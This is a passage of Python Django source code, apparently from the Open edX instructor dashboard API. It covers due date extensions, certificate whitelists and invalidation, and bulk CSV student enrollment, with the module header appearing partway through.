update_forum_role(course_id, user, rolename, action)
except Role.DoesNotExist:
return HttpResponseBadRequest("Role does not exist.")
response_payload = {
'course_id': course_id.to_deprecated_string(),
'action': action,
}
return JsonResponse(response_payload)
@require_POST
def get_user_invoice_preference(request, course_id): # pylint: disable=unused-argument
"""
Gets invoice copy user's preferences.
"""
invoice_copy_preference = True
invoice_preference_value = get_user_preference(request.user, INVOICE_KEY)
if invoice_preference_value is not None:
invoice_copy_preference = invoice_preference_value == 'True'
return JsonResponse({
'invoice_copy': invoice_copy_preference
})
def _display_unit(unit):
"""
Gets string for displaying unit to user.
"""
name = getattr(unit, 'display_name', None)
if name:
return u'{0} ({1})'.format(name, unit.location.to_deprecated_string())
else:
return unit.location.to_deprecated_string()
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('student', 'url', 'due_datetime')
def change_due_date(request, course_id):
"""
Grants a due date extension to a student for a particular unit.
"""
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
student = require_student_from_identifier(request.GET.get('student'))
unit = find_unit(course, request.GET.get('url'))
due_date = parse_datetime(request.GET.get('due_datetime'))
set_due_date_extension(course, unit, student, due_date)
return JsonResponse(_(
'Successfully changed due date for student {0} for {1} '
'to {2}').format(student.profile.name, _display_unit(unit),
due_date.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('student', 'url')
def reset_due_date(request, course_id):
"""
Rescinds a due date extension for a student on a particular unit.
"""
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
student = require_student_from_identifier(request.GET.get('student'))
unit = find_unit(course, request.GET.get('url'))
set_due_date_extension(course, unit, student, None)
if not getattr(unit, "due", None):
# It's possible the normal due date was deleted after an extension was granted:
return JsonResponse(
_("Successfully removed invalid due date extension (unit has no due date).")
)
original_due_date_str = unit.due.strftime('%Y-%m-%d %H:%M')
return JsonResponse(_(
'Successfully reset due date for student {0} for {1} '
'to {2}').format(student.profile.name, _display_unit(unit),
original_due_date_str))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('url')
def show_unit_extensions(request, course_id):
"""
Shows all of the students which have due date extensions for the given unit.
"""
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
unit = find_unit(course, request.GET.get('url'))
return JsonResponse(dump_module_extensions(course, unit))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('student')
def show_student_extensions(request, course_id):
"""
Shows all of the due date extensions granted to a particular student in a
particular course.
"""
student = require_student_from_identifier(request.GET.get('student'))
course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
return JsonResponse(dump_student_extensions(course, student))
def _split_input_list(str_list):
"""
Separate out individual student email from the comma, or space separated string.
e.g.
in: "Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed"
out: ['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed']
`str_list` is a string coming from an input text area
returns a list of separated values
"""
new_list = re.split(r'[\n\r\s,]', str_list)
new_list = [s.strip() for s in new_list]
new_list = [s for s in new_list if s != '']
return new_list
def _instructor_dash_url(course_key, section=None):
"""Return the URL for a section in the instructor dashboard.
Arguments:
course_key (CourseKey)
Keyword Arguments:
section (str): The name of the section to load.
Returns:
unicode: The URL of a section in the instructor dashboard.
"""
url = reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)})
if section is not None:
url += u'#view-{section}'.format(section=section)
return url
@require_global_staff
@require_POST
def generate_example_certificates(request, course_id=None): # pylint: disable=unused-argument
"""Start generating a set of example certificates.
Example certificates are used to verify that certificates have
been configured correctly for the course.
Redirects back to the intructor dashboard once certificate
generation has begun.
"""
course_key = CourseKey.from_string(course_id)
certs_api.generate_example_certificates(course_key)
return redirect(_instructor_dash_url(course_key, section='certificates'))
@require_global_staff
@require_POST
def enable_certificate_generation(request, course_id=None):
"""Enable/disable self-generated certificates for a course.
Once self-generated certificates have been enabled, students
who have passed the course will be able to generate certificates.
Redirects back to the intructor dashboard once the
setting has been updated.
"""
course_key = CourseKey.from_string(course_id)
is_enabled = (request.POST.get('certificates-enabled', 'false') == 'true')
certs_api.set_cert_generation_enabled(course_key, is_enabled)
return redirect(_instructor_dash_url(course_key, section='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def mark_student_can_skip_entrance_exam(request, course_id): # pylint: disable=invalid-name
"""
Mark a student to skip entrance exam.
Takes `unique_student_identifier` as required POST parameter.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
student_identifier = request.POST.get('unique_student_identifier')
student = get_student_from_identifier(student_identifier)
__, created = EntranceExamConfiguration.objects.get_or_create(user=student, course_id=course_id)
if created:
message = _('This student (%s) will skip the entrance exam.') % student_identifier
else:
message = _('This student (%s) is already allowed to skip the entrance exam.') % student_identifier
response_payload = {
'message': message,
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_generation(request, course_id):
"""
Start generating certificates for all students enrolled in given course.
"""
course_key = CourseKey.from_string(course_id)
task = instructor_task.api.generate_certificates_for_students(request, course_key)
message = _('Certificate generation task for all students of this course has been started. '
'You can view the status of the generation task in the "Pending Tasks" section.')
response_payload = {
'message': message,
'task_id': task.task_id
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_regeneration(request, course_id):
"""
Start regenerating certificates for students whose certificate statuses lie with in 'certificate_statuses'
entry in POST data.
"""
course_key = CourseKey.from_string(course_id)
certificates_statuses = request.POST.getlist('certificate_statuses', [])
if not certificates_statuses:
return JsonResponse(
{'message': _('Please select one or more certificate statuses that require certificate regeneration.')},
status=400
)
# Check if the selected statuses are allowed
allowed_statuses = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
if not set(certificates_statuses).issubset(allowed_statuses):
return JsonResponse(
{'message': _('Please select certificate statuses from the list only.')},
status=400
)
try:
instructor_task.api.regenerate_certificates(request, course_key, certificates_statuses)
except AlreadyRunningError as error:
return JsonResponse({'message': error.message}, status=400)
response_payload = {
'message': _('Certificate regeneration task has been started. '
'You can view the status of the generation task in the "Pending Tasks" section.'),
'success': True
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_exception_view(request, course_id):
"""
Add/Remove students to/from certificate white list.
:param request: HttpRequest object
:param course_id: course identifier of the course for whom to add/remove certificates exception.
:return: JsonResponse object with success/error message or certificate exception data.
"""
course_key = CourseKey.from_string(course_id)
# Validate request data and return error response in case of invalid data
try:
certificate_exception, student = parse_request_data_and_get_user(request, course_key)
except ValueError as error:
return JsonResponse({'success': False, 'message': error.message}, status=400)
# Add new Certificate Exception for the student passed in request data
if request.method == 'POST':
try:
exception = add_certificate_exception(course_key, student, certificate_exception)
except ValueError as error:
return JsonResponse({'success': False, 'message': error.message}, status=400)
return JsonResponse(exception)
# Remove Certificate Exception for the student passed in request data
elif request.method == 'DELETE':
try:
remove_certificate_exception(course_key, student)
except ValueError as error:
return JsonResponse({'success': False, 'message': error.message}, status=400)
return JsonResponse({}, status=204)
def add_certificate_exception(course_key, student, certificate_exception):
"""
Add a certificate exception to CertificateWhitelist table.
Raises ValueError in case Student is already white listed.
:param course_key: identifier of the course whose certificate exception will be added.
:param student: User object whose certificate exception will be added.
:param certificate_exception: A dict object containing certificate exception info.
:return: CertificateWhitelist item in dict format containing certificate exception info.
"""
if len(CertificateWhitelist.get_certificate_white_list(course_key, student)) > 0:
raise ValueError(
_("Student (username/email={user}) already in certificate exception list.").format(user=student.username)
)
certificate_white_list, __ = CertificateWhitelist.objects.get_or_create(
user=student,
course_id=course_key,
defaults={
'whitelist': True,
'notes': certificate_exception.get('notes', '')
}
)
generated_certificate = GeneratedCertificate.eligible_certificates.filter(
user=student,
course_id=course_key,
status=CertificateStatuses.downloadable,
).first()
exception = dict({
'id': certificate_white_list.id,
'user_email': student.email,
'user_name': student.username,
'user_id': student.id,
'certificate_generated': generated_certificate and generated_certificate.created_date.strftime("%B %d, %Y"),
'created': certificate_white_list.created.strftime("%A, %B %d, %Y"),
})
return exception
def remove_certificate_exception(course_key, student):
"""
Remove certificate exception for given course and student from CertificateWhitelist table and
invalidate its GeneratedCertificate if present.
Raises ValueError in case no exception exists for the student in the given course.
:param course_key: identifier of the course whose certificate exception needs to be removed.
:param student: User object whose certificate exception needs to be removed.
:return:
"""
try:
certificate_exception = CertificateWhitelist.objects.get(user=student, course_id=course_key)
except ObjectDoesNotExist:
raise ValueError(
_('Certificate exception (user={user}) does not exist in certificate white list. '
'Please refresh the page and try again.').format(user=student.username)
)
try:
generated_certificate = GeneratedCertificate.objects.get( # pylint: disable=no-member
user=student,
course_id=course_key
)
generated_certificate.invalidate()
log.info(
u'Certificate invalidated for %s in course %s when removed from certificate exception list',
student.username,
course_key
)
except ObjectDoesNotExist:
# Certificate has not been generated yet, so just remove the certificate exception from white list
pass
certificate_exception.delete()
def parse_request_data_and_get_user(request, course_key):
"""
Parse request data into Certificate Exception and User object.
Certificate Exception is the dict object containing information about certificate exception.
:param request:
:param course_key: Course Identifier of the course for whom to process certificate exception
:return: key-value pairs containing certificate exception data and User object
"""
certificate_exception = parse_request_data(request)
user = certificate_exception.get('user_name', '') or certificate_exception.get('user_email', '')
if not user:
raise ValueError(_('Student username/email field is required and can not be empty. '
'Kindly fill in username/email and then press "Add to Exception List" button.'))
db_user = get_student(user, course_key)
return certificate_exception, db_user
def parse_request_data(request):
"""
Parse and return request data, raise ValueError in case of invalid JSON data.
:param request: HttpRequest request object.
:return: dict object containing parsed json data.
"""
try:
data = json.loads(request.body or '{}')
except ValueError:
raise ValueError(_('The record is not in the correct format. Please add a valid username or email address.'))
return data
def get_student(username_or_email, course_key):
"""
Retrieve and return User object from db, raise ValueError
if user is does not exists or is not enrolled in the given course.
:param username_or_email: String containing either user name or email of the student.
:param course_key: CourseKey object identifying the current course.
:return: User object
"""
try:
student = get_user_by_username_or_email(username_or_email)
except ObjectDoesNotExist:
raise ValueError(_("{user} does not exist in the LMS. Please check your spelling and retry.").format(
user=username_or_email
))
# Make Sure the given student is enrolled in the course
if not CourseEnrollment.is_enrolled(student, course_key):
raise ValueError(_("{user} is not enrolled in this course. Please check your spelling and retry.")
.format(user=username_or_email))
return student
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_certificate_exceptions(request, course_id, generate_for=None):
"""
Generate Certificate for students in the Certificate White List.
:param request: HttpRequest object,
:param course_id: course identifier of the course for whom to generate certificates
:param generate_for: string to identify whether to generate certificates for 'all' or 'new'
additions to the certificate white-list
:return: JsonResponse object containing success/failure message and certificate exception data
"""
course_key = CourseKey.from_string(course_id)
if generate_for == 'all':
# Generate Certificates for all white listed students
students = 'all_whitelisted'
elif generate_for == 'new':
students = 'whitelisted_not_generated'
else:
# Invalid data, generate_for must be present for all certificate exceptions
return JsonResponse(
{
'success': False,
'message': _('Invalid data, generate_for must be "new" or "all".'),
},
status=400
)
instructor_task.api.generate_certificates_for_students(request, course_key, student_set=students)
response_payload = {
'success': True,
'message': _('Certificate generation started for white listed students.'),
}
return JsonResponse(response_payload)
@csrf_exempt
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_bulk_certificate_exceptions(request, course_id): # pylint: disable=invalid-name
"""
Add Students to certificate white list from the uploaded csv file.
:return response in dict format.
{
general_errors: [errors related to csv file e.g. csv uploading, csv attachment, content reading etc. ],
row_errors: {
data_format_error: [users/data in csv file that are not well formatted],
user_not_exist: [csv with none exiting users in LMS system],
user_already_white_listed: [users that are already white listed],
user_not_enrolled: [rows with not enrolled users in the given course]
},
success: [list of successfully added users to the certificate white list model]
}
"""
user_index = 0
notes_index = 1
row_errors_key = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
course_key = CourseKey.from_string(course_id)
students, general_errors, success = [], [], []
row_errors = {key: [] for key in row_errors_key}
def build_row_errors(key, _user, row_count):
"""
inner method to build dict of csv data as row errors.
"""
row_errors[key].append(_('user "{user}" in row# {row}').format(user=_user, row=row_count))
if 'students_list' in request.FILES:
try:
upload_file = request.FILES.get('students_list')
if upload_file.name.endswith('.csv'):
students = [row for row in csv.reader(upload_file.read().splitlines())]
else:
general_errors.append(_('Make sure that the file you upload is in CSV format with no '
'extraneous characters or rows.'))
except Exception: # pylint: disable=broad-except
general_errors.append(_('Could not read uploaded file.'))
finally:
upload_file.close()
row_num = 0
for student in students:
row_num += 1
# verify that we have exactly two column in every row either email or username and notes but allow for
# blank lines
if len(student) != 2:
if len(student) > 0:
build_row_errors('data_format_error', student[user_index], row_num)
log.info(u'invalid data/format in csv row# %s', row_num)
continue
user = student[user_index]
try:
user = get_user_by_username_or_email(user)
except ObjectDoesNotExist:
build_row_errors('user_not_exist', user, row_num)
log.info(u'student %s does not exist', user)
else:
if len(CertificateWhitelist.get_certificate_white_list(course_key, user)) > 0:
build_row_errors('user_already_white_listed', user, row_num)
log.warning(u'student %s already exist.', user.username)
# make sure user is enrolled in course
elif not CourseEnrollment.is_enrolled(user, course_key):
build_row_errors('user_not_enrolled', user, row_num)
log.warning(u'student %s is not enrolled in course.', user.username)
else:
CertificateWhitelist.objects.create(
user=user,
course_id=course_key,
whitelist=True,
notes=student[notes_index]
)
success.append(_('user "{username}" in row# {row}').format(username=user.username, row=row_num))
else:
general_errors.append(_('File is not attached.'))
results = {
'general_errors': general_errors,
'row_errors': row_errors,
'success': success
}
return JsonResponse(results)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_invalidation_view(request, course_id):
"""
Invalidate/Re-Validate students to/from certificate.
:param request: HttpRequest object
:param course_id: course identifier of the course for whom to add/remove certificates exception.
:return: JsonResponse object with success/error message or certificate invalidation data.
"""
course_key = CourseKey.from_string(course_id)
# Validate request data and return error response in case of invalid data
try:
certificate_invalidation_data = parse_request_data(request)
certificate = validate_request_data_and_get_certificate(certificate_invalidation_data, course_key)
except ValueError as error:
return JsonResponse({'message': error.message}, status=400)
# Invalidate certificate of the given student for the course course
if request.method == 'POST':
try:
certificate_invalidation = invalidate_certificate(request, certificate, certificate_invalidation_data)
except ValueError as error:
return JsonResponse({'message': error.message}, status=400)
return JsonResponse(certificate_invalidation)
# Re-Validate student certificate for the course course
elif request.method == 'DELETE':
try:
re_validate_certificate(request, course_key, certificate)
except ValueError as error:
return JsonResponse({'message': error.message}, status=400)
return JsonResponse({}, status=204)
def invalidate_certificate(request, generated_certificate, certificate_invalidation_data):
"""
Invalidate given GeneratedCertificate and add CertificateInvalidation record for future reference or re-validation.
:param request: HttpRequest object
:param generated_certificate: GeneratedCertificate object, the certificate we want to invalidate
:param certificate_invalidation_data: dict object containing data for CertificateInvalidation.
:return: dict object containing updated certificate invalidation data.
"""
if len(CertificateInvalidation.get_certificate_invalidations(
generated_certificate.course_id,
generated_certificate.user,
)) > 0:
raise ValueError(
_("Certificate of {user} has already been invalidated. Please check your spelling and retry.").format(
user=generated_certificate.user.username,
)
)
# Verify that certificate user wants to invalidate is a valid one.
if not generated_certificate.is_valid():
raise ValueError(
_("Certificate for student {user} is already invalid, kindly verify that certificate was generated "
"for this student and then proceed.").format(user=generated_certificate.user.username)
)
# Add CertificateInvalidation record for future reference or re-validation
certificate_invalidation, __ = CertificateInvalidation.objects.update_or_create(
generated_certificate=generated_certificate,
defaults={
'invalidated_by': request.user,
'notes': certificate_invalidation_data.get("notes", ""),
'active': True,
}
)
# Invalidate GeneratedCertificate
generated_certificate.invalidate()
return {
'id': certificate_invalidation.id,
'user': certificate_invalidation.generated_certificate.user.username,
'invalidated_by': certificate_invalidation.invalidated_by.username,
'created': certificate_invalidation.created.strftime("%B %d, %Y"),
'notes': certificate_invalidation.notes,
}
def re_validate_certificate(request, course_key, generated_certificate):
"""
Remove certificate invalidation from db and start certificate generation task for this student.
Raises ValueError if certificate invalidation is present.
:param request: HttpRequest object
:param course_key: CourseKey object identifying the current course.
:param generated_certificate: GeneratedCertificate object of the student for the given course
"""
try:
# Fetch CertificateInvalidation object
certificate_invalidation = CertificateInvalidation.objects.get(generated_certificate=generated_certificate)
except ObjectDoesNotExist:
raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
else:
# Deactivate certificate invalidation if it was fetched successfully.
certificate_invalidation.deactivate()
# We need to generate certificate only for a single student here
student = certificate_invalidation.generated_certificate.user
instructor_task.api.generate_certificates_for_students(
request, course_key, student_set="specific_student", specific_student_id=student.id
)
def validate_request_data_and_get_certificate(certificate_invalidation, course_key):
"""
Fetch and return GeneratedCertificate of the student passed in request data for the given course.
Raises ValueError in case of missing student username/email or
if student does not have certificate for the given course.
:param certificate_invalidation: dict containing certificate invalidation data
:param course_key: CourseKey object identifying the current course.
:return: GeneratedCertificate object of the student for the given course
"""
user = certificate_invalidation.get("user")
if not user:
raise ValueError(
_('Student username/email field is required and can not be empty. '
'Kindly fill in username/email and then press "Invalidate Certificate" button.')
)
student = get_student(user, course_key)
certificate = GeneratedCertificate.certificate_for_student(student, course_key)
if not certificate:
raise ValueError(_(
"The student {student} does not have certificate for the course {course}. Kindly verify student "
"username/email and the selected course are correct and try again."
).format(student=student.username, course=course_key.course))
return certificate
| """
Instructor Dashboard API views
JSON views which the instructor dashboard requests.
Many of these GETs may become PUTs in the future.
"""
import StringIO
import json
import logging
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from student import auth
from student.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
store_uploaded_file, course_and_time_based_filename_generator,
FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
Role,
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
Coupon,
CourseRegistrationCode,
RegistrationCodeRedemption,
Invoice,
CourseMode,
CourseRegistrationCodeInvoiceItem,
)
from student.models import (
CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
UserProfile, Registration, EntranceExamConfiguration,
ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
get_user_email_language,
enroll_email,
send_mail_to_student,
get_email_params,
send_beta_role_email,
unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import csv
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from student.models import get_user_by_username_or_email
from .tools import (
dump_student_extensions,
dump_module_extensions,
find_unit,
get_student_from_identifier,
require_student_from_identifier,
handle_dashboard_error,
parse_datetime,
set_due_date_extension,
strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
log = logging.getLogger(__name__)
def common_exceptions_400(func):
"""
Catches common exceptions and renders matching 400 errors.
(decorator without arguments)
"""
def wrapped(request, *args, **kwargs): # pylint: disable=missing-docstring
use_json = (request.is_ajax() or
request.META.get("HTTP_ACCEPT", "").startswith("application/json"))
try:
return func(request, *args, **kwargs)
except User.DoesNotExist:
message = _("User does not exist.")
if use_json:
return JsonResponse({"error": message}, 400)
else:
return HttpResponseBadRequest(message)
except AlreadyRunningError:
message = _("Task is already running.")
if use_json:
return JsonResponse({"error": message}, 400)
else:
return HttpResponseBadRequest(message)
return wrapped
def require_post_params(*args, **kwargs):
"""
Checks for required parameters or renders a 400 error.
(decorator with arguments)
`args` is a *list of required POST parameter names.
`kwargs` is a **dict of required POST parameter names
to string explanations of the parameter
"""
required_params = []
required_params += [(arg, None) for arg in args]
required_params += [(key, kwargs[key]) for key in kwargs]
# required_params = e.g. [('action', 'enroll or unenroll'), ['emails', None]]
def decorator(func): # pylint: disable=missing-docstring
def wrapped(*args, **kwargs): # pylint: disable=missing-docstring
request = args[0]
error_response_data = {
'error': 'Missing required query parameter(s)',
'parameters': [],
'info': {},
}
for (param, extra) in required_params:
default = object()
if request.POST.get(param, default) == default:
error_response_data['parameters'].append(param)
error_response_data['info'][param] = extra
if len(error_response_data['parameters']) > 0:
return JsonResponse(error_response_data, status=400)
else:
return func(*args, **kwargs)
return wrapped
return decorator
def require_level(level):
"""
Decorator with argument that requires an access level of the requesting
user. If the requirement is not satisfied, returns an
HttpResponseForbidden (403).
Assumes that request is in args[0].
Assumes that course_id is in kwargs['course_id'].
`level` is in ['instructor', 'staff']
if `level` is 'staff', instructors will also be allowed, even
if they are not in the staff group.
"""
if level not in ['instructor', 'staff']:
raise ValueError("unrecognized level '{}'".format(level))
def decorator(func): # pylint: disable=missing-docstring
def wrapped(*args, **kwargs): # pylint: disable=missing-docstring
request = args[0]
course = get_course_by_id(CourseKey.from_string(kwargs['course_id']))
if has_access(request.user, level, course):
return func(*args, **kwargs)
else:
return HttpResponseForbidden()
return wrapped
return decorator
def require_global_staff(func):
"""View decorator that requires that the user have global staff permissions. """
def wrapped(request, *args, **kwargs): # pylint: disable=missing-docstring
if GlobalStaff().has_user(request.user):
return func(request, *args, **kwargs)
else:
return HttpResponseForbidden(
u"Must be {platform_name} staff to perform this action.".format(
platform_name=settings.PLATFORM_NAME
)
)
return wrapped
def require_sales_admin(func):
"""
Decorator for checking sales administrator access before executing an HTTP endpoint. This decorator
is designed to be used for a request based action on a course. It assumes that there will be a
request object as well as a course_id attribute to leverage to check course level privileges.
If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
"""
def wrapped(request, course_id): # pylint: disable=missing-docstring
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s", course_id)
return HttpResponseNotFound()
access = auth.user_has_role(request.user, CourseSalesAdminRole(course_key))
if access:
return func(request, course_id)
else:
return HttpResponseForbidden()
return wrapped
def require_finance_admin(func):
"""
Decorator for checking finance administrator access before executing an HTTP endpoint. This decorator
is designed to be used for a request based action on a course. It assumes that there will be a
request object as well as a course_id attribute to leverage to check course level privileges.
If the user does not have privileges for this operation, this will return HttpResponseForbidden (403).
"""
def wrapped(request, course_id): # pylint: disable=missing-docstring
try:
course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s", course_id)
return HttpResponseNotFound()
access = auth.user_has_role(request.user, CourseFinanceAdminRole(course_key))
if access:
return func(request, course_id)
else:
return HttpResponseForbidden()
return wrapped
EMAIL_INDEX = 0
USERNAME_INDEX = 1
NAME_INDEX = 2
COUNTRY_INDEX = 3
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def register_and_enroll_students(request, course_id): # pylint: disable=too-many-statements
"""
Create new account and Enroll students in this course.
Passing a csv file that contains a list of students.
Order in csv should be the following email = 0; username = 1; name = 2; country = 3.
Requires staff access.
-If the email address and username already exists and the user is enrolled in the course,
do nothing (including no email gets sent out)
-If the email address already exists, but the username is different,
match on the email address only and continue to enroll the user in the course using the email address
as the matching criteria. Note the change of username as a warning message (but not a failure). Send a standard enrollment email
which is the same as the existing manual enrollment
-If the username already exists (but not the email), assume it is a different user and fail to create the new account.
The failure will be messaged in a response in the browser.
"""
if not microsite.get_value('ALLOW_AUTOMATED_SIGNUPS', settings.FEATURES.get('ALLOW_AUTOMATED_SIGNUPS', False)):
return HttpResponseForbidden()
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
warnings = []
row_errors = []
general_errors = []
# for white labels we use 'shopping cart' which uses CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG as
# course mode for creating course enrollments.
if CourseMode.is_white_label(course_id):
course_mode = CourseMode.DEFAULT_SHOPPINGCART_MODE_SLUG
else:
course_mode = None
if 'students_list' in request.FILES:
students = []
try:
upload_file = request.FILES.get('students_list')
if upload_file.name.endswith('.csv'):
students = [row for row in csv.reader(upload_file.read().splitlines())]
course = get_course_by_id(course_id)
else:
general_errors.append({
'username': '', 'email': '',
'response': _('Make sure that the file you upload is in CSV format with no extraneous characters or rows.')
})
except Exception: # pylint: disable=broad-except
general_errors.append({
'username': '', 'email': '', 'response': _('Could not read uploaded file.')
})
finally:
upload_file.close()
generated_passwords = []
row_num = 0
for student in students:
row_num = row_num + 1
# verify that we have exactly four columns in every row but allow for blank lines
if len(student) != 4:
if len(student) > 0:
general_errors.append({
'username': '',
'email': '',
'response': _('Data in row #{row_num} must have exactly four columns: email, username, full name, and country').format(row_num=row_num)
})
continue
# Iterate each student in the uploaded csv file.
email = student[EMAIL_INDEX]
username = student[USERNAME_INDEX]
name = student[NAME_INDEX]
country = student[COUNTRY_INDEX][:2]
email_params = get_email_params(course, True, secure=request.is_secure())
try:
validate_email(email) # Raises ValidationError if invalid
except ValidationError:
row_errors.append({
'username': username, 'email': email, 'response': _('Invalid email {email_address}.').format(email_address=email)})
else:
if User.objects.filter(email=email).exists():
# Email address already exists. assume it is the correct user
# and just register the user in the course and send an enrollment email.
user = User.objects.get(email=email)
# see if it is an exact match with email and username
# if it's not an exact match then just display a warning message, but continue onwards
if not User.objects.filter(email=email, username=username).exists():
warning_message = _(
'An account with email {email} exists but the provided username {username} '
'is different. Enrolling anyway with {email}.'
).format(email=email, username=username)
warnings.append({
'username': username, 'email': email, 'response': warning_message
})
log.warning(u'email %s already exist', email)
else:
log.info(
u"user already exists with username '%s' and email '%s'",
username,
email
)
# enroll a user if it is not already enrolled.
if not CourseEnrollment.is_enrolled(user, course_id):
# Enroll user to the course and add manual enrollment audit trail
create_manual_course_enrollment(
user=user,
course_id=course_id,
mode=course_mode,
enrolled_by=request.user,
reason='Enrolling via csv upload',
state_transition=UNENROLLED_TO_ENROLLED,
)
enroll_email(course_id=course_id, student_email=email, auto_enroll=True, email_students=True, email_params=email_params)
else:
# This email does not yet exist, so we need to create a new account
# If username already exists in the database, then create_and_enroll_user
# will raise an IntegrityError exception.
password = generate_unique_password(generated_passwords)
errors = create_and_enroll_user(
email, username, name, country, password, course_id, course_mode, request.user, email_params
)
row_errors.extend(errors)
else:
general_errors.append({
'username': '', 'email': '', 'response': _('File is not attached.')
})
results = {
'row_errors': row_errors,
'general_errors': general_errors,
'warnings': warnings
}
return JsonResponse(results)
def generate_random_string(length):
"""
Create a string of random characters of specified length
"""
chars = [
char for char in string.ascii_uppercase + string.digits + string.ascii_lowercase
if char not in 'aAeEiIoOuU1l'
]
return string.join((random.choice(chars) for __ in range(length)), '')
def generate_unique_password(generated_passwords, password_length=12):
"""
generate a unique password for each student.
"""
password = generate_random_string(password_length)
while password in generated_passwords:
password = generate_random_string(password_length)
generated_passwords.append(password)
return password
def create_user_and_user_profile(email, username, name, country, password):
"""
Create a new user, add a new Registration instance for letting user verify its identity and create a user profile.
:param email: user's email address
:param username: user's username
:param name: user's name
:param country: user's country
:param password: user's password
:return: User instance of the new user.
"""
user = User.objects.create_user(username, email, password)
reg = Registration()
reg.register(user)
profile = UserProfile(user=user)
profile.name = name
profile.country = country
profile.save()
return user
def create_manual_course_enrollment(user, course_id, mode, enrolled_by, reason, state_transition):
"""
Create course enrollment for the given student and create manual enrollment audit trail.
